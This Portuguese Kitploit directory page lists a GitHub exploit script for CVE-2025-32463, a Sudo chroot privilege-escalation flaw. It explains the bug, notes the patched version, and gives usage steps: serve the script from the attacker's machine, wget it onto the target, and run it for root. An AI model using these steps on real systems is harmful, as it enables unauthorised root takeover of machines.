Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/justjoeyking/cve-2025-32463
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubjustjoeyking/cve-2025-32463

CVE-2025-32463

Script de exploit Bash para CVE-2025-32463, uma vulnerabilidade de escalonamento local de privilégios no Sudo 1.9.17 via opção chroot, permitindo acesso root em sistemas afetados.

Ver Repositório
3há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

A versão 1.9.17 do Sudo possui uma vulnerabilidade crítica (CVE-2025-32463) que permite que usuários locais obtenham acesso root ao explorar a opção chroot, o que pode levar a sérios riscos de segurança. Recomenda-se que os usuários atualizem para a versão 1.9.17p1 ou posterior para mitigar esse problema.

Visão geral da vulnerabilidade do Sudo 1.9.17:-

A vulnerabilidade na versão 1.9.17 do Sudo, identificada como CVE-2025-32463, é uma falha crítica que permite que usuários locais obtenham acesso root. Esse problema surge de uma alteração na forma como o Sudo lida com a opção --chroot (-R), que tem a finalidade de isolar processos alterando seu diretório raiz.

Como a vulnerabilidade funciona:-

Problema de resolução de caminho: Nas versões 1.9.14 a 1.9.17, o Sudo avalia a opção --chroot antes de verificar as permissões do usuário. Isso permite que atacantes controlem o ambiente e carreguem bibliotecas maliciosas.

Etapas de exploração:

Um atacante cria um arquivo nsswitch.conf malicioso em um diretório que controla. Ele executa o Sudo com a opção -R, fazendo com que o Sudo carregue a configuração e as bibliotecas do atacante, concedendo acesso root.

Eu criei um script bash "cwoot.sh" que, após a execução, eleva diretamente para o usuário root.

Faça o seguinte:

Baixe o script do repositório: git clone https://github.com/justjoeyking/CVE-2025-32463.git

Na sua própria máquina: python3 -m http.server 8080

Na máquina alvo: wget http://<own_IP_address>:8080/cwoot.sh

Na máquina alvo: chmod 755 cwoot.sh

Execute o script na máquina alvo: ./cwoot.sh

Baixar ferramenta